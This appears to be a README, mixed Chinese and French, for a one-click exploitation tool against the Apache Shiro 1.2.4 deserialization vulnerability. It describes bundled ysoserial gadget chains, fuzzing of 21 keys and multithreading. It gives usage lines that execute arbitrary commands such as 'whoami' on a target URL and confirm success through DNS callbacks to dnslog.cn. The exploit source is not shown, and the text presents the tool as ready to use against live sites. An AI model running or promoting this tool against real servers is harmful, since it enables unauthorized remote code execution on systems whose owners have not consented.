
shiro 1.2.47 反序列化
Désérialisation Shiro<=1.2.4, outil de détection en un clic
改动内容:1.新增4个利用链模块(CommonsCollections7-10),预计增加成功率30%,已打包成新ysoserial的jar包,请勿更换
改动内容:2.增加多线程,虽模块增加但速度却提高300%
集成21个key进行fuzz
Si cela vous aide, cliquez sur une étoile, article de blog correspondant : http://www.svenbeast.com/post/tskRKJIPg/
pip3 install -r requirments.txt
Usage : python3 shiro.py url command
Usage : python3 shiro.py https://url.com whoami
http://www.dnslog.cn/ Validation : il est recommandé d'utiliser cette plateforme dnslog, elle est beaucoup plus rapide que ceye.io
Si la commande exécutée contient des espaces, pensez à la mettre entre ""
usage : python3 shiro.py http://url.com "ping dnslog.cn"
Exécutez les 11 modules en entier, puis allez sur la plateforme dnslog vérifier si une requête est reçue. Si rien ne sort, c'est GG, c'est peut-être aussi parce que le nombre d'encodages n'est pas encore suffisant.
Collectez vous-même les encodages et ajoutez vos propres méthodes dans le code source sous moule.
Pour simplifier l'exécution du script, le nombre de threads n'est pas contrôlé par un paramètre de l'utilisateur ; par défaut 20 threads. Pour le modifier, allez dans /moule/main.py ligne 20 et changez le paramètre de contrôle des threads.